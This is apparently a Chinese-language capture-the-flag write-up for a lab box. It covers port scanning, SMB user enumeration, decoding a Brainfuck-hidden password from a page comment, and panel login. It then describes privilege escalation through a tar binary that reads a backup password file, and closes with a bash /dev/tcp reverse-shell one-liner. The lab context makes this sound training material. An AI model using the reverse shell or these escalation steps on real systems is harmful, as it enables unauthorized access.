This box was created to be an Easy box, but it can be Medium if you get lost.
本地地址192.168.252.140
信息搜集
80端口是一个apache的默认页,没什么东西,先扫描端口:
网页端开了80、10000、20000三个端口,进后两个端口需要https,10000是用户登录,20000是管理员登录。同时还开启了139端口和445端口,这两个端口都是危险端口,可能存在利用空间。
攻击流程
使用kali中的enum4linux对smp服务进行枚举攻击:
爆破出来一个账号cyber。
返回80端口,在其中的html里,我们发现了一段注释:
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
一眼brainfuck,解出来结果为.2uqPEfj3D<P'a-3
尝试以cyber为用户名,解密结果为密码进行登录,在20000端口登陆成功。登录成功后,发现web页面居然有虚拟终端可以用,我们在cyber的默认目录下得到flag1:
权限提升
同时我们发现同目录下还有一个叫做tar的ELF文件,权限为0755,这个命令猜测应该可以打开什么文件,然后就是全盘搜索时间,通过find / -name "*pass*",在/var/backups中发现一个叫old_pass.bak的隐藏文件,应该就是要这个了。
具体操作如下:
其中./tar是我们看到的那个文件,tar是bash命令。
猜测这个应该就是root的密码了,但是这个虚拟终端不能直接提权,因此我们得反弹shell:
bash -i >& /dev/tcp/localhost/2333 0>&1